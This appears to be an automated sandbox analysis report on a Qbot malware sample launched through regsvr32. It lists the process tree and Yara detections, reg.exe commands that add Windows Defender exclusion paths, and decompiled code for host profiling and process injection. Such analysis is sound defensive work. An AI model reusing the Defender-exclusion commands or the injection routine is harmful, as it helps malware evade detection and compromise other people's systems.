Commandline:	regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Imagebase:	0xff800000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2956 Parent PID: 2568

General

Start time:	22:18:14
Start date:	05/10/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\Celod.wac2'
Imagebase:	0x7c0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000003.719512472.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 2300 Parent PID: 2956

General

Start time:	22:18:46
Start date:	05/10/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x410000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: reg.exe PID: 2288 Parent PID: 2300

General

Start time:	22:18:47
Start date:	05/10/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0'
Imagebase:	0xff6e0000
File size:	74752 bytes
MD5 hash:	9D0B3066FE3D1FD345E86BC7BCCED9E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: reg.exe PID: 1968 Parent PID: 2300

General

Start time:	22:18:48
Start date:	05/10/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uwwyocree' /d '0'
Imagebase:	0xff700000
File size:	74752 bytes
MD5 hash:	9D0B3066FE3D1FD345E86BC7BCCED9E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 2904 Parent PID: 1672

General

Start time:	22:20:00
Start date:	05/10/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Imagebase:	0xfff30000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 2936 Parent PID: 2904

General

Start time:	22:20:00
Start date:	05/10/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\Celod.wac2'
Imagebase:	0x370000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 3024 Parent PID: 2988 regsvr32.exeCOMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	49

Executed Functions

Function 6CB0D061, Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E6CB0D061(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x6cb1e69c; // 0x6cb00000
				_t81 = E6CB085E5(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x6cb1e684; // 0xdbfaa0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E6CB12339( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E6CB08F9F(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E6CB0BA47(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E6CB0BBCF( *_t88) == 0) {
					_t90 = E6CB0BAA4(_t178, _t222); // executed
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E6CB0E433(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E6CB0E3F8(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t97 =  *0x6cb1e694; // 0xdbfbf8
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E6CB08F9F(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E6CB0B7EA(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E6CB0B6BF(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E6CB08FB9(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E6CB0D442(_t43, E6CB0C3BB(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E6CB0B8CC(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E6CB0BC21(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x6cb1e684; // 0xdbfaa0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E6CB095C2(_t199, 0x10c);
				_t200 =  *0x6cb1e684; // 0xdbfaa0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x6cb1e684; // 0xdbfaa0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E6CB085B6( &_v8);
				_t124 =  *0x6cb1e684; // 0xdbfaa0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E6CB09621(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x6cb1e684; // 0xdbfaa0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x6cb1e684; // 0xdbfaa0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x6cb1e684; // 0xdbfaa0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x6cb1e684; // 0xdbfaa0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x6cb1e684; // 0xdbfaa0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x6cb1e684; // 0xdbfaa0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E6CB12339(E6CB0D442(_t75, E6CB0C3BB(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E6CB1230B( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E6CB0900E(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E6CB0CD75(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}

0x6cb0d061
0x6cb0d06b
0x6cb0d077
0x6cb0d07c
0x6cb0d081
0x6cb0d441
0x6cb0d441
0x6cb0d08e
0x6cb0d094
0x6cb0d099
0x6cb0d09f
0x6cb0d0af
0x6cb0d0bb
0x6cb0d0bb
0x6cb0d0c4
0x6cb0d0ca
0x6cb0d0cc
0x6cb0d0d5
0x6cb0d0d5
0x6cb0d0e1
0x6cb0d0e5
0x6cb0d0ea
0x6cb0d0f0
0x6cb0d0f9
0x6cb0d107
0x6cb0d10e
0x6cb0d113
0x6cb0d113
0x6cb0d114
0x6cb0d0fb
0x6cb0d0fb
0x6cb0d0fb
0x6cb0d11a
0x6cb0d120
0x6cb0d125
0x6cb0d12b
0x6cb0d133
0x6cb0d13d
0x6cb0d14a
0x6cb0d155
0x6cb0d15d
0x6cb0d17e
0x6cb0d180
0x6cb0d180
0x6cb0d182
0x6cb0d18c
0x6cb0d198
0x6cb0d1a8
0x6cb0d1ae
0x6cb0d1b4
0x6cb0d1b6
0x6cb0d1c7
0x6cb0d1cd
0x6cb0d1d3
0x6cb0d1d8
0x6cb0d1de
0x6cb0d1e4
0x6cb0d1e9
0x6cb0d1ee
0x6cb0d1ee
0x6cb0d1f4
0x6cb0d1f4
0x6cb0d1fd
0x6cb0d209
0x6cb0d211
0x6cb0d215
0x6cb0d215
0x6cb0d211
0x6cb0d219
0x6cb0d21f
0x6cb0d225
0x6cb0d22c
0x6cb0d23d
0x6cb0d243
0x6cb0d24b
0x6cb0d252
0x6cb0d254
0x6cb0d265
0x6cb0d26b
0x6cb0d270
0x6cb0d273
0x6cb0d276
0x6cb0d27c
0x6cb0d282
0x6cb0d284
0x6cb0d28a
0x6cb0d293
0x6cb0d296
0x6cb0d296
0x6cb0d299
0x6cb0d2a1
0x6cb0d2ac
0x6cb0d2b2
0x6cb0d2a3
0x6cb0d2a5
0x6cb0d2a5
0x6cb0d2bb
0x6cb0d2bb
0x6cb0d2c1
0x6cb0d2c9
0x6cb0d2d4
0x6cb0d2d9
0x6cb0d2df
0x6cb0d2e1
0x6cb0d2ee
0x6cb0d2ef
0x6cb0d2f0
0x6cb0d2fb
0x6cb0d2fd
0x6cb0d304
0x6cb0d304
0x6cb0d30e
0x6cb0d313
0x6cb0d318
0x6cb0d318
0x6cb0d31e
0x6cb0d325
0x6cb0d326
0x6cb0d333
0x6cb0d346
0x6cb0d34b
0x6cb0d350
0x6cb0d359
0x6cb0d359
0x6cb0d35f
0x6cb0d364
0x6cb0d36a
0x6cb0d370
0x6cb0d375
0x6cb0d37e
0x6cb0d380
0x6cb0d387
0x6cb0d387
0x6cb0d38d
0x6cb0d395
0x6cb0d39a
0x6cb0d39b
0x6cb0d3a0
0x6cb0d3a9
0x6cb0d3ab
0x6cb0d3b6
0x6cb0d3b6
0x6cb0d3bf
0x6cb0d3c7
0x6cb0d3ce
0x6cb0d3d3
0x6cb0d3e2
0x6cb0d3fa
0x6cb0d401
0x6cb0d40f
0x6cb0d421
0x6cb0d428
0x6cb0d430
0x6cb0d435
0x00000000

APIs

Part of subcall function 6CB085E5: HeapAlloc.KERNEL32(00000008,?,?,6CB08F65,00000100,?,6CB05FAC), ref: 6CB085F3

GetCurrentProcessId.KERNEL32 ref: 6CB0D088
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 6CB0D0C4
GetCurrentProcess.KERNEL32 ref: 6CB0D0E1
LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 6CB0D173
GetLastError.KERNEL32 ref: 6CB0D180
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 6CB0D1AE
GetLastError.KERNEL32 ref: 6CB0D1B4
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 6CB0D209
GetCurrentProcess.KERNEL32 ref: 6CB0D250

Part of subcall function 6CB0BAA4: CloseHandle.KERNEL32(?,00000000,74EC17D9,6CB00000), ref: 6CB0BB48

memset.MSVCRT ref: 6CB0D26B
GetVersionExA.KERNEL32(00000000), ref: 6CB0D276
GetCurrentProcess.KERNEL32(00000100), ref: 6CB0D290
IsWow64Process.KERNEL32(00000000), ref: 6CB0D293
GetSystemInfo.KERNEL32(?), ref: 6CB0D2AC
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 6CB0D2C9

Strings

TEMP, xrefs: 6CB0D36A, 6CB0D375, 6CB0D386
USERPROFILE, xrefs: 6CB0D326, 6CB0D354
SystemDrive, xrefs: 6CB0D395, 6CB0D3A0, 6CB0D3B5
%s\%s, xrefs: 6CB0D33B
TEMP, xrefs: 6CB0D335

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: Process$Current$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsWow64memset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 2155830292-2706916422
Opcode ID: 83b68a2095c346f8634458fdd73c7cffad24eff1ed8cfe084fc05c87c2d2488f
Instruction ID: e631781a22d463d8db6094e33ee6ae36c8202c1cdfc2d045a8d4c8e449e2df42
Opcode Fuzzy Hash: 83b68a2095c346f8634458fdd73c7cffad24eff1ed8cfe084fc05c87c2d2488f
Instruction Fuzzy Hash: 3EB14971700784AFD714DB74D889FEE7BF8EB09304F11486DE55AD7A80EB70AA488B61

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0C702, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200
nativeregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E6CB0C702(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x6cb1e688; // 0xd40590
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E6CB0E280(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x6cb1e780; // 0xdbfbc8
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
					if(_t106 != 0) {
						DestroyWindow(_t106); // executed
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E6CB0864A( *0x6cb1e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E6CB085FB( &_v32, 0x1ac4);
					_t141 =  *0x6cb1e688; // 0xd40590
					 *0x6cb1e688 = _t131;
					E6CB086C2(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E6CB0C681(_v12, _v8, _v36);
					 *0x6cb1e688 = _t141;
					goto L14;
				}
			}

0x6cb0c708
0x6cb0c70f
0x6cb0c711
0x6cb0c713
0x6cb0c715
0x6cb0c718
0x6cb0c71b
0x6cb0c71e
0x6cb0c721
0x6cb0c724
0x6cb0c727
0x6cb0c731
0x6cb0c734
0x6cb0c73b
0x6cb0c740
0x6cb0c740
0x6cb0c746
0x6cb0c748
0x6cb0c751
0x6cb0c8f7
0x6cb0c8fb
0x6cb0c900
0x6cb0c906
0x6cb0c909
0x6cb0c909
0x6cb0c90d
0x6cb0c912
0x6cb0c924
0x6cb0c924
0x6cb0c92d
0x6cb0c937
0x6cb0c937
0x6cb0c93e
0x6cb0c93e
0x6cb0c760
0x6cb0c77a
0x00000000
0x00000000
0x6cb0c785
0x6cb0c78f
0x6cb0c799
0x6cb0c79c
0x6cb0c7a2
0x6cb0c7a9
0x6cb0c7aa
0x6cb0c7ab
0x6cb0c7b4
0x6cb0c7b5
0x6cb0c7b6
0x6cb0c7b8
0x6cb0c7bb
0x6cb0c7be
0x6cb0c7c1
0x6cb0c7c4
0x6cb0c7d0
0x6cb0c7f2
0x6cb0c7fa
0x6cb0c7fd
0x6cb0c808
0x6cb0c808
0x6cb0c7fa
0x6cb0c833
0x6cb0c8f4
0x00000000
0x6cb0c839
0x6cb0c845
0x6cb0c85a
0x00000000
0x00000000
0x6cb0c870
0x6cb0c872
0x6cb0c879
0x00000000
0x00000000
0x6cb0c88a
0x6cb0c8a1
0x6cb0c8b1
0x6cb0c8bd
0x6cb0c8c2
0x6cb0c8c8
0x6cb0c8d8
0x6cb0c8e4
0x6cb0c8ec
0x00000000
0x6cb0c8ec

APIs

NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,6CB05CCD), ref: 6CB0C775
RegisterClassExA.USER32 ref: 6CB0C7C7
CreateWindowExA.USER32 ref: 6CB0C7F2
DestroyWindow.USER32 ref: 6CB0C7FD
UnregisterClassA.USER32(?,00000000), ref: 6CB0C808
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6CB0C824
NtMapViewOfSection.NTDLL(?,00000000), ref: 6CB0C82E
NtMapViewOfSection.NTDLL(?,6CB0CBE2,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6CB0C855
VirtualAllocEx.KERNEL32(6CB0CBE2,00000000,00001AC4,00001000,00000004), ref: 6CB0C898
WriteProcessMemory.KERNEL32(6CB0CBE2,00000000,00000000,00001AC4,?), ref: 6CB0C8B1

Part of subcall function 6CB085FB: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 6CB08641

GetCurrentProcess.KERNEL32(00000000), ref: 6CB0C91D
NtUnmapViewOfSection.NTDLL(00000000), ref: 6CB0C924
NtClose.NTDLL(00000000), ref: 6CB0C937

Strings

0, xrefs: 6CB0C78F
cdcdwqwqwq, xrefs: 6CB0C7AC
sadccdcdsasa, xrefs: 6CB0C780

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 2002808388-2319545179
Opcode ID: f7835093b58c7982b037825996dff695b5350e595e2d9b1b03a13711515816eb
Instruction ID: b98bcd03d4fc5d8cb75d1dbaf2cbd7fdc390ea0203512ba2e1611176984efdb4
Opcode Fuzzy Hash: f7835093b58c7982b037825996dff695b5350e595e2d9b1b03a13711515816eb
Instruction Fuzzy Hash: 76715D71A01288AFEF11DF95C849EEFBBB9FB49704F21006AF501B7A40C7709A01CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CB05F63, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E6CB085D0();
				_t19 = E6CB097ED( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E6CB08F59();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x6cb1e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E6CB095A8(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E6CB085A3( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E6CB12A93( *0x6cb1e69c);
						 *_t55 = 0x7c3;
						 *0x6cb1e684 = E6CB0E1FE(0x6cb1ba20, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E6CB095C2(0x6cb1ba20);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E6CB085B6();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E6CB05DE7, 0, 0,  &_v8);
							 *0x6cb1e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E6CB085B6();
					}
					goto L10;
				}
			}

0x6cb05f63
0x6cb05f73
0x6cb05f7d
0x6cb060b1
0x6cb060a4
0x00000000
0x6cb060a6
0x6cb060b8
0x6cb06079
0x00000000
0x6cb06079
0x6cb05f83
0x6cb05f8b
0x6cb05f92
0x6cb05f94
0x00000000
0x6cb05fa7
0x6cb05fa7
0x6cb05fad
0x6cb05fb3
0x6cb05fc3
0x6cb05fc8
0x6cb05fd0
0x6cb05fd8
0x6cb05ff4
0x6cb05ff9
0x6cb05ffc
0x6cb05ffe
0x6cb06000
0x6cb0600d
0x6cb06016
0x6cb0601f
0x6cb06024
0x6cb06025
0x6cb06033
0x6cb0603d
0x6cb0604e
0x6cb06053
0x6cb0605a
0x6cb06061
0x6cb06064
0x6cb06070
0x6cb06071
0x6cb0607d
0x6cb06086
0x6cb06098
0x6cb0609b
0x6cb060a2
0x00000000
0x00000000
0x00000000
0x6cb060a2
0x6cb06073
0x6cb06078
0x00000000
0x6cb05fd8

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 6CB05F73
SetLastError.KERNEL32(000000AA), ref: 6CB060B8

Part of subcall function 6CB085D0: HeapCreate.KERNEL32(00000000,00080000,00000000,6CB05F88), ref: 6CB085D9

Part of subcall function 6CB097ED: GetSystemTimeAsFileTime.KERNEL32(?,?,6CB05F90), ref: 6CB097FA
Part of subcall function 6CB097ED: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB0981A

GetModuleHandleA.KERNEL32(00000000), ref: 6CB05FAD
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6CB05FC8
GetLastError.KERNEL32 ref: 6CB05FD0
memset.MSVCRT ref: 6CB05FF4
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 6CB06016
GetFileAttributesW.KERNEL32(00000000), ref: 6CB06064
CreateThread.KERNEL32(00000000,00000000,6CB05DE7,00000000,00000000,?), ref: 6CB06098

Strings

Hello qqq, xrefs: 6CB05F6E

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
